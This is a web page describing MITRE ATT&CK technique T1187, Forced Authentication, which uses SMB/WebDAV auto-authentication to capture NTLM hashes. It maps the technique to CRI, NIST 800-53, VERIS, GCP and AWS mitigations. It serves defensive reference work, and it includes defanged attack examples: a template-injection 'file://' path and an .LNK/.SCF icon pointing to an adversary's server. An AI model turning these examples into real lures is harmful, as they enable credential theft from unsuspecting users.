1. Home
  2. ATT&CK Techniques
  3. T1187 Forced Authentication

T1187 Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
View in MITRE ATT&CK®

CRI Profile Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
PR.AA-03.01 Authentication requirements Mitigates T1187 Forced Authentication
Comments
This diagnostic statement describes how the organization implement appropriate authentication requirements, including selecting mechanisms based on risk, utilizing multi-factor authentication where necessary, and safeguarding the storage of authenticators like pins and passwords to protect sensitive access credentials.
References
    PR.IR-01.02 Network device configurations Mitigates T1187 Forced Authentication
    Comments
    This diagnostic statement provides protection through secure network device configurations (e.g., firewall rules, ports, protocols) aligned to security baselines. Using network appliances to block or filter network traffic that is not necessary within the environment can mitigate adversaries from obtaining credentials through forced authentication.
    References
      PR.IR-01.03 Network communications integrity and availability Mitigates T1187 Forced Authentication
      Comments
      This diagnostic statement protects against Forced Authentication through the use of secure network configurations, architecture, implementations of zero trust architecture, and segmentation.
      References
        PR.AA-01.01 Identity and credential management Mitigates T1187 Forced Authentication
        Comments
        This diagnostic statement protects against Forced Authentication through the use of hardened access control policies, secure defaults, password complexity requirements, multifactor authentication requirements, and removal of terminated accounts.
        References
          PR.PS-01.08 End-user device protection Mitigates T1187 Forced Authentication
          Comments
          This diagnostic statement protects against Forced Authentication through the use of limiting access to resources to only authorized devices, management of personal computing devices, network intrusion prevention, and the use of antimalware.
          References

            NIST 800-53 Mappings

            Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
            CA-07 Continuous Monitoring mitigates T1187 Forced Authentication
            CM-06 Configuration Settings mitigates T1187 Forced Authentication
            SI-10 Information Input Validation mitigates T1187 Forced Authentication
            SI-15 Information Output Filtering mitigates T1187 Forced Authentication
            CM-02 Baseline Configuration mitigates T1187 Forced Authentication
            CM-07 Least Functionality mitigates T1187 Forced Authentication
            SI-04 System Monitoring mitigates T1187 Forced Authentication
            AC-03 Access Enforcement mitigates T1187 Forced Authentication
            AC-04 Information Flow Enforcement mitigates T1187 Forced Authentication
            SC-07 Boundary Protection mitigates T1187 Forced Authentication

            VERIS Mappings

            Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
            action.hacking.variety.Abuse of functionality Abuse of functionality. related-to T1187 Forced Authentication
            action.hacking.variety.AiTM Adversary-in-the-middle attack. Child of 'Exploit vuln' related-to T1187 Forced Authentication
            action.hacking.variety.Use of stolen creds Use of stolen or default authentication credentials (including credential stuffing) related-to T1187 Forced Authentication
            attribute.confidentiality.data_disclosure None related-to T1187 Forced Authentication

            GCP Mappings

            Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
            cloud_ngfw Cloud Next-Generation Firewall (NGFW)_ technique_scores T1187 Forced Authentication
            Comments
            Cloud NGFW can allow or deny traffic based on the traffic's protocol, destination ports, sources, and destinations. This functionality can be used to block SMB and WebDAV traffic from exiting the network which can protect against adversaries from forcing authentication over SMB and WebDAV. This mapping is given a score of Significant because Cloud NGFW can block this traffic or restrict where it can go to.
            References
            1. ['https://cloud.google.com/firewalls']

            AWS Mappings

            Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
            aws_network_firewall AWS Network Firewall technique_scores T1187 Forced Authentication
            Comments
            AWS Network Firewall has the ability to pass, drop, or alert on traffic based on the network protocol as well as perform deep packet inspection on the payload. This functionality can be used to block SMB and WebDAV traffic from exiting the network which can protect against adversaries from forcing authentication over SMB and WebDAV. This mapping is given a score of Significant because AWS Network Firewall can block this traffic or restrict where it can go to.
            References
            1. https://docs.aws.amazon.com/network-firewall/latest/developerguide/what-is-aws-network-firewall.html